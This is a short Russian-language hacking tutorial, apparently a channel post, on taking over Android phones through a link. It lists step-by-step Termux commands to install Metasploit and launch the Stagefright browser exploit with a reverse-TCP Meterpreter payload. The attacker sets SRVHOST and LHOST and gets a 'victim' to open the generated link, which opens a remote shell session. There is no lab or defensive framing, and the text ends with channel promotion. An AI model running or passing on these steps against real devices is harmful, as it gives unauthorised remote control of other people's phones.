Взлом Android ссылкой

Всем доброго времени суток, друзья. Рассмотрим с вами способы, как взломать любой Андроид смартфон обычной ссылкой! Получим удаленный доступ.

Обнаружили ряд серьезных уязвимостей в одном из компонентов ядра мобильной ОС Android под названием Stagefright.

Для реализации атаки нам будет достаточно заставить жертву перейти по вредоносной ссылке, чтобы получить удаленный доступ к Android.

Устанавливаем Metasploit Framework

Обновляем пакеты с помощью команды:

pkg update && pkg upgrade

Далее устанавливаем все необходимые библиотеки:

pkg install unstable-repo

pkg install x11-repo

И устанавливаем Metasploit:

pkg install metasploit

Ожидаем окончание процесса установки.

Эксплуатируем Stagefright

Открываем Metasploit с помощью команды:

msfconsole

Далее задействуем эксплойт для эксплуатации уязвимости:

exploit/android/browser/stagefright_mp4_tx3g_64bit

Выставляем значение нашего IP-адреса:

set SRVHOST <ip-адрес>

set LHOST <ip-адрес>

Теперь прописываем следующие параметры:

set URIPATH / 

set PAYLOAD linux/armle/mettle/reverse_tcp

set VERBOSE true

Запускаем эксплойт:

exploit -j

В открывшемся окне появится вредоносная ссылка, по которой должна перейти наша жертва. Если жертва перейдет по ней, то в нашем терминале откроется сессия для удаленного доступа.

подпишись на все наши проекты и следи за новостями

основной канал

софт цифровой крепости

библиотека цифровой крепости

наш чат